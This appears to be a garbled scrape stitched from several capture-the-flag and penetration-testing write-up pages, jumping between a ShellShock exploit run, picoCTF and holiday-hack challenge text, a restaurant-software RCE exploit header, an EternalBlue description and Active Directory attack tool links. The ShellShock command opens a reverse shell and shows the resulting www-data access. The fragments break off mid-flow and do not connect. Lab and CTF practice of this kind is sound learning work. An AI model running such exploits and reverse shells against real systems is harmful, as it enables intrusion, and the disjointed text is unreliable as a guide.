➜ sumo python shell_shock.py payload=reverse rhost=192.168.241.87 lhost=192.168.49.241 lport=6666 pages=/cgi-bin/test
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/test
[!] Successfully exploited
[!] Incoming connection from 192.168.241.87
192.168.241.87> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
192.168.241.87> whoami
Run the runme.py script to get the flag. Download the script with your browser or with wget in the webshell. Download runme.py Python script
oste-picoctf@webshell:~$ wget https://artifacts.picoctf.net/c/92/runme.py
--2022-01-12 20:51:52-- https://artifacts.picoctf.net/c/92/runme.py
Resolving artifacts.picoctf.net (artifacts.picoctf.net)... 99.84.248.96, 99.84.248.26, 99.84.248.60, ...
Connecting to artifacts.picoctf.net (artifacts.picoctf.net)|99.84.248.96|:443... connected.
HTTP request sent, awaiting response... 200 OK
Turn up the heat to defrost the entrance to Frost Tower. Click on the Items tab in your badge to find a link to the Wifi Dongle's CLI interface. Talk to Greasy Gopherguts outside the tower for tips.
Howdy howdy! Mind helping me with this homew- er, challenge?
Someone ran nmap -oG on a big network and produced this bigscan.gnmap file.
The quizme program has the questions and hints and, incidentally,
has NOTHING to do with an Elf University assignment. Thanks!
Answer all the questions in the quizme executable:
# Exploit Title: Restaurant Management System 1.0 - Remote Code Execution | |
# Date: 2019-10-16 | |
# Exploit Author: Ibad Shah | |
# Script Modified by: 05t3 :twitter @oste_ke | |
# Vendor Homepage: https://www.sourcecodester.com/users/lewa | |
# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html | |
# Version: N/A | |
# Tested on: Apache 2.4.41 | |
#!/usr/bin/python |
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability."
You can read more about the exploit Wikipedia or Avast's Blog
Bloodhound & neo4j https://bloodhound.readthedocs.io/en/latest/installation/linux.html
SharpHound https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify.
PowerView.ps1 can be downloaded here
For more functions, check out: